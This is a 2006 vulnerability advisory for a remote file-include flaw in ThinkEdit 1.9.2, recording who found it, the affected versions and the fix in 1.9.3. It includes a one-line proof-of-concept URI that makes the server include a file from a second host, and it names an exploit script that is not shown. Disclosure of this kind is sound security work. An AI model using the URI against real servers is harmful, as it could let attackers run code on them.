ThinkEdit Render.PHP Remote File Include Vulnerability

Bugtraq ID:	21535
Class:	Input Validation Error
CVE:
Remote:	Yes
Local:	No
Published:	Dec 11 2006 12:00AM
Updated:	Dec 11 2006 12:00AM
Credit:	r0ut3r is credited with the discovery of this vulnerability.
Vulnerable:	ThinkEdit ThinkEdit 1.9.2
Not Vulnerable:	ThinkEdit ThinkEdit 1.9.3

ThinkEdit Render.PHP Remote File Include Vulnerability

ThinkEdit is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Version 1.9.2 is vulnerable; other versions may also be affected.

ThinkEdit Render.PHP Remote File Include Vulnerability

An attacker can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://www.example.com/includes/functions.php?phpbb_root_path="www.example2.com"

• /data/vulnerabilities/exploits/think.pl

ThinkEdit Render.PHP Remote File Include Vulnerability

Solution:
The vendor has released version 1.9.3 to address this issue. Please see the references for more information.

ThinkEdit Render.PHP Remote File Include Vulnerability

References:

• Diff of /trunk/design/thinkedit/render.php (ThinkEdit)
  
• Vendor Homepage (ThinkEdit)